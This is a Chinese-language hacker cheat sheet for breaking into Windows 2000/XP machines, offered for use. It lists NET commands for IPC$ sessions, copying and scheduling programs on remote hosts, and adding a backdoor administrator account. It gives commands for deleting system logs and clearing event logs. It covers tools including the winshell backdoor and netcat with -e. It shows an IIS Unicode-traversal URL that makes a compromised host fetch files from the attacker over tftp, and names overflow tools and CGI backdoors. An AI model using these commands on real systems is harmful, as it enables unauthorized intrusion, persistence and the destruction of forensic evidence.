经常使用的几条NET命令:
(与远程主机创建空管链接) net use \\IP地址\ipc$ "" /use:""
(以管理员身份登陆远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
(传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
(查看远程主机时间) net time \\IP地址
(定时启动某个程序) at \\IP地址 02:18 readme.exe
(查看共享) net view \\IP地址
(查看netbios工做组列表) nbtstat -A IP地址
(将远程主机C盘映射为本身的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
(这两条把本身增长到管理员组): net user 用户名 密码 /add
net localgroup Administrators 用户名 /add
(断开链接) net use \\IP地址\ipc$ /delete
扫尾:
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
1、netsvc.exe
下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
netsvc schedule
\\IP
地址 /query
netsvc
\\IP
地址 schedule /start
2、OpenTelnet.exe
远程启动主机的Telnet服务,并绑定端口到7878,例如:
OpenTelnet
\\IP
地址 用户名 密码 1 7878
而后就能够telnet到主机的7878端口,进入DOS方式下:
telnet IP地址 7878
3、winshell.exe
一个很是小的***(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
p Path (查看winshell主程序的路径信息)
b reBoot (从新启动机器)
d shutDown (关闭机器)
s Shell (执行后你就会看到可爱的“C:\>”)
x eXit (退出本次登陆会话,此命令并不终止winshell的运行)
4、3389登录器,GUI方式登陆远程主机的
5、elsave.exe
事件日志清除工具
elsave -s
\\IP
地址 -l "application" -C
elsave -s
\\IP
地址 -l "system" -C
elsave -s
\\IP
地址 -l "security" -C
执行后成功清除应用程序日志,系统日志,
安全
日志
6、hbulot.exe
开启win2kserver和winxp的3389服务
hbulot [/r]
使用/r表示安装完成后自动重起目标使设置生效。
7、nc.exe(netcat.exe)
一个很好的工具,一些脚本程序都要用到它,也可作溢出后的链接用。
想要链接到某处: nc [-options] hostname port[s] [ports] ...
绑定端口等待链接: nc -l -p port [-options] [hostname] [port]
参数:
-e prog 程序重定向,一旦链接,就执行 [危险!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 帮助信息
-i secs 延时的间隔
-l 监听模式,用于入站链接
-n 指定数字的IP地址,不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 任意指定本地及远程端口
-s addr 本地源地址
-u UDP模式
-v 详细输出——用两个-v可获得更详细的内容
-w secs timeout的时间
-z 将输入输出关掉——用于扫描时
8、TFTPD32.EXE
把本身的电脑临时变为一台FTP
服务器
,让肉鸡来下载文件,tftp命令要在肉鸡上执行,一般要利用Unicode漏洞或telnet到肉鸡,例如:
[url]http://IP[/url]
地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
而后能够直接令文件运行:
9、prihack.exe是IIS的printer远程缓冲区溢出工具
idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,而后用telnet链接它的监听端口,若是溢出成功,一连它的端口,绑定的命令立刻执行。xploit.exe是一个图形界面的ida溢出,成功之后winxp下须要打winxp。
一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。而后用IE浏览器链接。